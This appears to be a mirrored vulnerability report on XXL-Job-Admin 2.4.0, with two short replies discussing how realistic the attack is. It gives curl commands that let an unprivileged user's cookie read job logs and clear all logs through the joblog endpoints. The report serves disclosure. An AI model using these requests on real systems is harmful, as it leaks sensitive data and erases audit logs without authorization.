Environment
MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)
Vulnerability Information
It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss.
Steps to reproduce the behavior
Step 1: Create a normal user without any privilege inside the web console as below
Step 2: Retrieve the cookie for the user
Step 3: Run the following command for testing log querycurl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'
It can show the successful log query and return 200 status.
Step 4: Run the following command for log clearingcurl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'
it will return 200 status.
Step 5. Show the log in the console. It will show that all log is cleared successfully by normal user.
2条答案
按热度按时间aij0ehis1#
Create an unprivileged user and get its cookie, which I don't think is easy for attackers.
yfwxisqw2#
Agree. The assumption of the attack is that you gained an unprivileged account.